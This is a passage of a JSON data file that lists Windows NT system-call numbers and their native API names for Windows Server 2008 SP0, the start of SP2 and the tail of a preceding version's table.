\"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAcquireCMFViewOwnership\", \"103\": \"NtAddBootEntry\", \"104\": \"NtAddDriverEntry\", \"105\": \"NtAdjustGroupsToken\", \"106\": \"NtAlertResumeThread\", \"107\": \"NtAlertThread\", \"108\": \"NtAllocateLocallyUniqueId\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelDeviceWakeupRequest\", \"135\": \"NtCancelIoFileEx\", \"136\": \"NtCancelSynchronousIoFile\", \"137\": \"NtCommitComplete\", \"138\": \"NtCommitEnlistment\", \"139\": \"NtCommitTransaction\", \"140\": \"NtCompactKeys\", \"141\": \"NtCompareTokens\", \"142\": \"NtCompleteConnectPort\", \"143\": \"NtCompressKey\", \"144\": \"NtConnectPort\", \"145\": \"NtCreateDebugObject\", \"146\": \"NtCreateDirectoryObject\", \"147\": \"NtCreateEnlistment\", \"148\": \"NtCreateEventPair\", \"149\": \"NtCreateIoCompletion\", \"150\": \"NtCreateJobObject\", \"151\": \"NtCreateJobSet\", \"152\": \"NtCreateKeyTransacted\", \"153\": \"NtCreateKeyedEvent\", \"154\": \"NtCreateMailslotFile\", \"155\": \"NtCreateMutant\", \"156\": \"NtCreateNamedPipeFile\", \"157\": \"NtCreatePagingFile\", \"158\": \"NtCreatePort\", \"159\": \"NtCreatePrivateNamespace\", \"160\": \"NtCreateProcess\", \"161\": \"NtCreateProfile\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisplayString\", \"184\": \"NtEnumerateBootEntries\", \"185\": \"NtEnumerateDriverEntries\", \"186\": \"NtEnumerateSystemEnvironmentValuesEx\", \"187\": \"NtEnumerateTransactionObject\", \"188\": \"NtExtendSection\", \"189\": \"NtFilterToken\", \"190\": \"NtFlushInstallUILanguage\", \"191\": \"NtFlushInstructionCache\", \"192\": \"NtFlushKey\", \"193\": \"NtFlushProcessWriteBuffers\", \"194\": \"NtFlushVirtualMemory\", \"195\": \"NtFlushWriteBuffer\", \"196\": \"NtFreeUserPhysicalPages\", \"197\": \"NtFreezeRegistry\", \"198\": \"NtFreezeTransactions\", \"199\": \"NtGetContextThread\", \"200\": \"NtGetCurrentProcessorNumber\", \"201\": \"NtGetDevicePowerState\", \"202\": \"NtGetMUIRegistryInfo\", \"203\": \"NtGetNextProcess\", \"204\": \"NtGetNextThread\", \"205\": \"NtGetNlsSectionPtr\", \"206\": \"NtGetNotificationResourceManager\", \"207\": \"NtGetPlugPlayEvent\", \"208\": \"NtGetWriteWatch\", \"209\": \"NtImpersonateAnonymousToken\", \"210\": \"NtImpersonateThread\", \"211\": \"NtInitializeNlsFiles\", \"212\": \"NtInitializeRegistry\", \"213\": \"NtInitiatePowerAction\", \"214\": \"NtIsSystemResumeAutomatic\", \"215\": \"NtIsUILanguageComitted\", \"216\": \"NtListenPort\", \"217\": \"NtLoadDriver\", \"218\": \"NtLoadKey\", \"219\": \"NtLoadKey2\", \"220\": \"NtLoadKeyEx\", \"221\": \"NtLockFile\", \"222\": \"NtLockProductActivationKeys\", \"223\": \"NtLockRegistryKey\", \"224\": \"NtLockVirtualMemory\", \"225\": \"NtMakePermanentObject\", \"226\": \"NtMakeTemporaryObject\", \"227\": \"NtMapCMFModule\", \"228\": \"NtMapUserPhysicalPages\", \"229\": \"NtModifyBootEntry\", \"230\": \"NtModifyDriverEntry\", \"231\": \"NtNotifyChangeDirectoryFile\", \"232\": \"NtNotifyChangeKey\", \"233\": \"NtNotifyChangeMultipleKeys\", \"234\": \"NtOpenEnlistment\", \"235\": \"NtOpenEventPair\", \"236\": \"NtOpenIoCompletion\", \"237\": \"NtOpenJobObject\", \"238\": \"NtOpenKeyTransacted\", \"239\": \"NtOpenKeyedEvent\", \"240\": \"NtOpenMutant\", \"241\": \"NtOpenObjectAuditAlarm\", \"242\": \"NtOpenPrivateNamespace\", \"243\": \"NtOpenProcessToken\", \"244\": \"NtOpenResourceManager\", \"245\": \"NtOpenSemaphore\", \"246\": \"NtOpenSession\", \"247\": \"NtOpenSymbolicLinkObject\", \"248\": \"NtOpenThread\", \"249\": \"NtOpenTimer\", \"250\": \"NtOpenTransaction\", \"251\": \"NtOpenTransactionManager\", \"252\": \"NtPlugPlayControl\", \"253\": \"NtPrePrepareComplete\", \"254\": \"NtPrePrepareEnlistment\", \"255\": \"NtPrepareComplete\", \"256\": \"NtPrepareEnlistment\", \"257\": \"NtPrivilegeCheck\", \"258\": \"NtPrivilegeObjectAuditAlarm\", \"259\": \"NtPrivilegedServiceAuditAlarm\", \"260\": \"NtPropagationComplete\", \"261\": \"NtPropagationFailed\", \"262\": \"NtPulseEvent\", \"263\": \"NtQueryBootEntryOrder\", \"264\": \"NtQueryBootOptions\", \"265\": \"NtQueryDebugFilterState\", \"266\": \"NtQueryDirectoryObject\", \"267\": \"NtQueryDriverEntryOrder\", \"268\": \"NtQueryEaFile\", \"269\": \"NtQueryFullAttributesFile\", \"270\": \"NtQueryInformationAtom\", \"271\": \"NtQueryInformationEnlistment\", \"272\": \"NtQueryInformationJobObject\", \"273\": \"NtQueryInformationPort\", \"274\": \"NtQueryInformationResourceManager\", \"275\": \"NtQueryInformationTransaction\", \"276\": \"NtQueryInformationTransactionManager\", \"277\": \"NtQueryInformationWorkerFactory\", \"278\": \"NtQueryInstallUILanguage\", \"279\": \"NtQueryIntervalProfile\", \"280\": \"NtQueryIoCompletion\", \"281\": \"NtQueryLicenseValue\", \"282\": \"NtQueryMultipleValueKey\", \"283\": \"NtQueryMutant\", \"284\": \"NtQueryOpenSubKeys\", \"285\": \"NtQueryOpenSubKeysEx\", \"286\": \"NtQueryPortInformationProcess\", \"287\": \"NtQueryQuotaInformationFile\", \"288\": \"NtQuerySecurityObject\", \"289\": \"NtQuerySemaphore\", \"290\": \"NtQuerySymbolicLinkObject\", \"291\": \"NtQuerySystemEnvironmentValue\", \"292\": \"NtQuerySystemEnvironmentValueEx\", \"293\": \"NtQueryTimerResolution\", \"294\": \"NtRaiseException\", \"295\": \"NtRaiseHardError\", \"296\": \"NtReadOnlyEnlistment\", \"297\": \"NtRecoverEnlistment\", \"298\": \"NtRecoverResourceManager\", \"299\": \"NtRecoverTransactionManager\", \"300\": \"NtRegisterProtocolAddressInformation\", \"301\": \"NtRegisterThreadTerminatePort\", \"302\": \"NtReleaseCMFViewOwnership\", \"303\": \"NtReleaseKeyedEvent\", \"304\": \"NtReleaseWorkerFactoryWorker\", \"305\": \"NtRemoveIoCompletionEx\", \"306\": \"NtRemoveProcessDebug\", \"307\": \"NtRenameKey\", \"308\": \"NtRenameTransactionManager\", \"309\": \"NtReplaceKey\", \"310\": \"NtReplacePartitionUnit\", \"311\": \"NtReplyWaitReplyPort\", \"312\": \"NtRequestDeviceWakeup\", \"313\": \"NtRequestPort\", \"314\": \"NtRequestWakeupLatency\", \"315\": \"NtResetEvent\", \"316\": \"NtResetWriteWatch\", \"317\": \"NtRestoreKey\", \"318\": \"NtResumeProcess\", \"319\": \"NtRollbackComplete\", \"320\": \"NtRollbackEnlistment\", \"321\": \"NtRollbackTransaction\", \"322\": \"NtRollforwardTransactionManager\", \"323\": \"NtSaveKey\", \"324\": \"NtSaveKeyEx\", \"325\": \"NtSaveMergedKeys\", \"326\": \"NtSecureConnectPort\", \"327\": \"NtSetBootEntryOrder\", \"328\": \"NtSetBootOptions\", \"329\": \"NtSetContextThread\", \"330\": \"NtSetDebugFilterState\", \"331\": \"NtSetDefaultHardErrorPort\", \"332\": \"NtSetDefaultLocale\", \"333\": \"NtSetDefaultUILanguage\", \"334\": \"NtSetDriverEntryOrder\", \"335\": \"NtSetEaFile\", \"336\": \"NtSetHighEventPair\", \"337\": \"NtSetHighWaitLowEventPair\", \"338\": \"NtSetInformationDebugObject\", \"339\": \"NtSetInformationEnlistment\", \"340\": \"NtSetInformationJobObject\", \"341\": \"NtSetInformationKey\", \"342\": \"NtSetInformationResourceManager\", \"343\": \"NtSetInformationToken\", \"344\": \"NtSetInformationTransaction\", \"345\": \"NtSetInformationTransactionManager\", \"346\": \"NtSetInformationWorkerFactory\", \"347\": \"NtSetIntervalProfile\", \"348\": \"NtSetIoCompletion\", \"349\": \"NtSetLdtEntries\", \"350\": \"NtSetLowEventPair\", \"351\": \"NtSetLowWaitHighEventPair\", \"352\": \"NtSetQuotaInformationFile\", \"353\": \"NtSetSecurityObject\", \"354\": \"NtSetSystemEnvironmentValue\", \"355\": \"NtSetSystemEnvironmentValueEx\", \"356\": \"NtSetSystemInformation\", \"357\": \"NtSetSystemPowerState\", \"358\": \"NtSetSystemTime\", \"359\": \"NtSetThreadExecutionState\", \"360\": \"NtSetTimerResolution\", \"361\": \"NtSetUuidSeed\", \"362\": \"NtSetVolumeInformationFile\", \"363\": \"NtShutdownSystem\", \"364\": \"NtShutdownWorkerFactory\", \"365\": \"NtSignalAndWaitForSingleObject\", \"366\": \"NtSinglePhaseReject\", \"367\": \"NtStartProfile\", \"368\": \"NtStopProfile\", \"369\": \"NtSuspendProcess\", \"370\": \"NtSuspendThread\", \"371\": \"NtSystemDebugControl\", \"372\": \"NtTerminateJobObject\", \"373\": \"NtTestAlert\", \"374\": \"NtThawRegistry\", \"375\": \"NtThawTransactions\", \"376\": \"NtTraceControl\", \"377\": \"NtTranslateFilePath\", \"378\": \"NtUnloadDriver\", \"379\": \"NtUnloadKey\", \"380\": \"NtUnloadKey2\", \"381\": \"NtUnloadKeyEx\", \"382\": \"NtUnlockFile\", \"383\": \"NtUnlockVirtualMemory\", \"384\": \"NtVdmControl\", \"385\": \"NtWaitForDebugEvent\", \"386\": \"NtWaitForKeyedEvent\", \"387\": \"NtWaitForWorkViaWorkerFactory\", \"388\": \"NtWaitHighEventPair\", \"389\": \"NtWaitLowEventPair\", \"390\": \"NtWorkerFactoryWorkerReady\"}}, \"Windows Server 2008\": {\"SP0\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAcquireCMFViewOwnership\", \"103\": \"NtAddBootEntry\", \"104\": \"NtAddDriverEntry\", \"105\": \"NtAdjustGroupsToken\", \"106\": \"NtAlertResumeThread\", \"107\": \"NtAlertThread\", \"108\": \"NtAllocateLocallyUniqueId\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtRequestDeviceWakeup\", \"135\": \"NtCancelIoFileEx\", \"136\": \"NtCancelSynchronousIoFile\", \"137\": \"NtCommitComplete\", \"138\": \"NtCommitEnlistment\", \"139\": \"NtCommitTransaction\", \"140\": \"NtCompactKeys\", \"141\": \"NtCompareTokens\", \"142\": \"NtCompleteConnectPort\", \"143\": \"NtCompressKey\", \"144\": \"NtConnectPort\", \"145\": \"NtCreateDebugObject\", \"146\": \"NtCreateDirectoryObject\", \"147\": \"NtCreateEnlistment\", \"148\": \"NtCreateEventPair\", \"149\": \"NtCreateIoCompletion\", \"150\": \"NtCreateJobObject\", \"151\": \"NtCreateJobSet\", \"152\": \"NtCreateKeyTransacted\", \"153\": \"NtCreateKeyedEvent\", \"154\": \"NtCreateMailslotFile\", \"155\": \"NtCreateMutant\", \"156\": \"NtCreateNamedPipeFile\", \"157\": \"NtCreatePagingFile\", \"158\": \"NtCreatePort\", \"159\": \"NtCreatePrivateNamespace\", \"160\": \"NtCreateProcess\", \"161\": \"NtCreateProfile\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisplayString\", \"184\": \"NtEnumerateBootEntries\", \"185\": \"NtEnumerateDriverEntries\", \"186\": \"NtEnumerateSystemEnvironmentValuesEx\", \"187\": \"NtEnumerateTransactionObject\", \"188\": \"NtExtendSection\", \"189\": \"NtFilterToken\", \"190\": \"NtFlushInstallUILanguage\", \"191\": \"NtFlushInstructionCache\", \"192\": \"NtFlushKey\", \"193\": \"NtFlushProcessWriteBuffers\", \"194\": \"NtFlushVirtualMemory\", \"195\": \"NtFlushWriteBuffer\", \"196\": \"NtFreeUserPhysicalPages\", \"197\": \"NtFreezeRegistry\", \"198\": \"NtFreezeTransactions\", \"199\": \"NtGetContextThread\", \"200\": \"NtGetCurrentProcessorNumber\", \"201\": \"NtGetDevicePowerState\", \"202\": \"NtGetMUIRegistryInfo\", \"203\": \"NtGetNextProcess\", \"204\": \"NtGetNextThread\", \"205\": \"NtGetNlsSectionPtr\", \"206\": \"NtGetNotificationResourceManager\", \"207\": \"NtGetPlugPlayEvent\", \"208\": \"NtGetWriteWatch\", \"209\": \"NtImpersonateAnonymousToken\", \"210\": \"NtImpersonateThread\", \"211\": \"NtInitializeNlsFiles\", \"212\": \"NtInitializeRegistry\", \"213\": \"NtInitiatePowerAction\", \"214\": \"NtIsSystemResumeAutomatic\", \"215\": \"NtIsUILanguageComitted\", \"216\": \"NtListenPort\", \"217\": \"NtLoadDriver\", \"218\": \"NtLoadKey\", \"219\": \"NtLoadKey2\", \"220\": \"NtLoadKeyEx\", \"221\": \"NtLockFile\", \"222\": \"NtLockProductActivationKeys\", \"223\": \"NtLockRegistryKey\", \"224\": \"NtLockVirtualMemory\", \"225\": \"NtMakePermanentObject\", \"226\": \"NtMakeTemporaryObject\", \"227\": \"NtMapCMFModule\", \"228\": \"NtMapUserPhysicalPages\", \"229\": \"NtModifyBootEntry\", \"230\": \"NtModifyDriverEntry\", \"231\": \"NtNotifyChangeDirectoryFile\", \"232\": \"NtNotifyChangeKey\", \"233\": \"NtNotifyChangeMultipleKeys\", \"234\": \"NtOpenEnlistment\", \"235\": \"NtOpenEventPair\", \"236\": \"NtOpenIoCompletion\", \"237\": \"NtOpenJobObject\", \"238\": \"NtOpenKeyTransacted\", \"239\": \"NtOpenKeyedEvent\", \"240\": \"NtOpenMutant\", \"241\": \"NtOpenObjectAuditAlarm\", \"242\": \"NtOpenPrivateNamespace\", \"243\": \"NtOpenProcessToken\", \"244\": \"NtOpenResourceManager\", \"245\": \"NtOpenSemaphore\", \"246\": \"NtOpenSession\", \"247\": \"NtOpenSymbolicLinkObject\", \"248\": \"NtOpenThread\", \"249\": \"NtOpenTimer\", \"250\": \"NtOpenTransaction\", \"251\": \"NtOpenTransactionManager\", \"252\": \"NtPlugPlayControl\", \"253\": \"NtPrePrepareComplete\", \"254\": \"NtPrePrepareEnlistment\", \"255\": \"NtPrepareComplete\", \"256\": \"NtPrepareEnlistment\", \"257\": \"NtPrivilegeCheck\", \"258\": \"NtPrivilegeObjectAuditAlarm\", \"259\": \"NtPrivilegedServiceAuditAlarm\", \"260\": \"NtPropagationComplete\", \"261\": \"NtPropagationFailed\", \"262\": \"NtPulseEvent\", \"263\": \"NtQueryBootEntryOrder\", \"264\": \"NtQueryBootOptions\", \"265\": \"NtQueryDebugFilterState\", \"266\": \"NtQueryDirectoryObject\", \"267\": \"NtQueryDriverEntryOrder\", \"268\": \"NtQueryEaFile\", \"269\": \"NtQueryFullAttributesFile\", \"270\": \"NtQueryInformationAtom\", \"271\": \"NtQueryInformationEnlistment\", \"272\": \"NtQueryInformationJobObject\", \"273\": \"NtQueryInformationPort\", \"274\": \"NtQueryInformationResourceManager\", \"275\": \"NtQueryInformationTransaction\", \"276\": \"NtQueryInformationTransactionManager\", \"277\": \"NtQueryInformationWorkerFactory\", \"278\": \"NtQueryInstallUILanguage\", \"279\": \"NtQueryIntervalProfile\", \"280\": \"NtQueryIoCompletion\", \"281\": \"NtQueryLicenseValue\", \"282\": \"NtQueryMultipleValueKey\", \"283\": \"NtQueryMutant\", \"284\": \"NtQueryOpenSubKeys\", \"285\": \"NtQueryOpenSubKeysEx\", \"286\": \"NtQueryPortInformationProcess\", \"287\": \"NtQueryQuotaInformationFile\", \"288\": \"NtQuerySecurityObject\", \"289\": \"NtQuerySemaphore\", \"290\": \"NtQuerySymbolicLinkObject\", \"291\": \"NtQuerySystemEnvironmentValue\", \"292\": \"NtQuerySystemEnvironmentValueEx\", \"293\": \"NtQueryTimerResolution\", \"294\": \"NtRaiseException\", \"295\": \"NtRaiseHardError\", \"296\": \"NtReadOnlyEnlistment\", \"297\": \"NtRecoverEnlistment\", \"298\": \"NtRecoverResourceManager\", \"299\": \"NtRecoverTransactionManager\", \"300\": \"NtRegisterProtocolAddressInformation\", \"301\": \"NtRegisterThreadTerminatePort\", \"302\": \"NtReleaseCMFViewOwnership\", \"303\": \"NtReleaseKeyedEvent\", \"304\": \"NtReleaseWorkerFactoryWorker\", \"305\": \"NtRemoveIoCompletionEx\", \"306\": \"NtRemoveProcessDebug\", \"307\": \"NtRenameKey\", \"308\": \"NtRenameTransactionManager\", \"309\": \"NtReplaceKey\", \"310\": \"NtReplacePartitionUnit\", \"311\": \"NtReplyWaitReplyPort\", \"312\": \"NtCancelDeviceWakeupRequest\", \"313\": \"NtRequestPort\", \"314\": \"NtRequestWakeupLatency\", \"315\": \"NtResetEvent\", \"316\": \"NtResetWriteWatch\", \"317\": \"NtRestoreKey\", \"318\": \"NtResumeProcess\", \"319\": \"NtRollbackComplete\", \"320\": \"NtRollbackEnlistment\", \"321\": \"NtRollbackTransaction\", \"322\": \"NtRollforwardTransactionManager\", \"323\": \"NtSaveKey\", \"324\": \"NtSaveKeyEx\", \"325\": \"NtSaveMergedKeys\", \"326\": \"NtSecureConnectPort\", \"327\": \"NtSetBootEntryOrder\", \"328\": \"NtSetBootOptions\", \"329\": \"NtSetContextThread\", \"330\": \"NtSetDebugFilterState\", \"331\": \"NtSetDefaultHardErrorPort\", \"332\": \"NtSetDefaultLocale\", \"333\": \"NtSetDefaultUILanguage\", \"334\": \"NtSetDriverEntryOrder\", \"335\": \"NtSetEaFile\", \"336\": \"NtSetHighEventPair\", \"337\": \"NtSetHighWaitLowEventPair\", \"338\": \"NtSetInformationDebugObject\", \"339\": \"NtSetInformationEnlistment\", \"340\": \"NtSetInformationJobObject\", \"341\": \"NtSetInformationKey\", \"342\": \"NtSetInformationResourceManager\", \"343\": \"NtSetInformationToken\", \"344\": \"NtSetInformationTransaction\", \"345\": \"NtSetInformationTransactionManager\", \"346\": \"NtSetInformationWorkerFactory\", \"347\": \"NtSetIntervalProfile\", \"348\": \"NtSetIoCompletion\", \"349\": \"NtSetLdtEntries\", \"350\": \"NtSetLowEventPair\", \"351\": \"NtSetLowWaitHighEventPair\", \"352\": \"NtSetQuotaInformationFile\", \"353\": \"NtSetSecurityObject\", \"354\": \"NtSetSystemEnvironmentValue\", \"355\": \"NtSetSystemEnvironmentValueEx\", \"356\": \"NtSetSystemInformation\", \"357\": \"NtSetSystemPowerState\", \"358\": \"NtSetSystemTime\", \"359\": \"NtSetThreadExecutionState\", \"360\": \"NtSetTimerResolution\", \"361\": \"NtSetUuidSeed\", \"362\": \"NtSetVolumeInformationFile\", \"363\": \"NtShutdownSystem\", \"364\": \"NtShutdownWorkerFactory\", \"365\": \"NtSignalAndWaitForSingleObject\", \"366\": \"NtSinglePhaseReject\", \"367\": \"NtStartProfile\", \"368\": \"NtStopProfile\", \"369\": \"NtSuspendProcess\", \"370\": \"NtSuspendThread\", \"371\": \"NtSystemDebugControl\", \"372\": \"NtTerminateJobObject\", \"373\": \"NtTestAlert\", \"374\": \"NtThawRegistry\", \"375\": \"NtThawTransactions\", \"376\": \"NtTraceControl\", \"377\": \"NtTranslateFilePath\", \"378\": \"NtUnloadDriver\", \"379\": \"NtUnloadKey\", \"380\": \"NtUnloadKey2\", \"381\": \"NtUnloadKeyEx\", \"382\": \"NtUnlockFile\", \"383\": \"NtUnlockVirtualMemory\", \"384\": \"NtVdmControl\", \"385\": \"NtWaitForDebugEvent\", \"386\": \"NtWaitForKeyedEvent\", \"387\": \"NtWaitForWorkViaWorkerFactory\", \"388\": \"NtWaitHighEventPair\", \"389\": \"NtWaitLowEventPair\", \"390\": \"NtWorkerFactoryWorkerReady\"}, \"SP2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": 